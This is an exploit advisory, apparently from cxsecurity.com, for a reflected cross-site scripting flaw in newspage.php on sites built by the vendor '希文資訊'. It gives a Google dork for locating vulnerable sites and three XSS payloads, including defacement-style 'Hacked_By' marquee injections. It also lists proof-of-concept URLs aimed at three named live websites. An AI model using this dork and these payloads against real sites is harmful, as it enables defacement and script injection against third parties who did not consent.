Design by 希文資訊 Cross Site Scripting Vulnerability

2015.12.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################################################## # Exploit Title: Design by 希文資訊 Cross Site Scripting Vulnerability ######################################################## # Google Dork: intext: intext:"Design by 希文資訊" newspage.php? # Exploit Author: Gray Hat Group=>MR.BL4CK # Vendor Homepage: [http://www.linuxpro.com.tw/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then test for this vulnerability You must Test scripts in After Id Number. # for example These scripts: # 1-[<script>alert('XSS')</script> # 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>] # 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>] # Poc: # http://malaysia.seven.com.tw/newspage.php?id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # GooD LucK ######################################################## # Demo: # http://malaysia.seven.com.tw/newspage.php?id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://my8585.com.tw/newspage.php?id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://au85.com.tw/newspage.php?id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : Bl4ck W4rning | Dalghak | MR.BL4CK | WHITE | H!dden V!rus | Shayan 72 | Keian | Ahriman | MR.ROBOT # We Are Gray Hat Hackers # Discovered By:MR.BL4CK ########################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top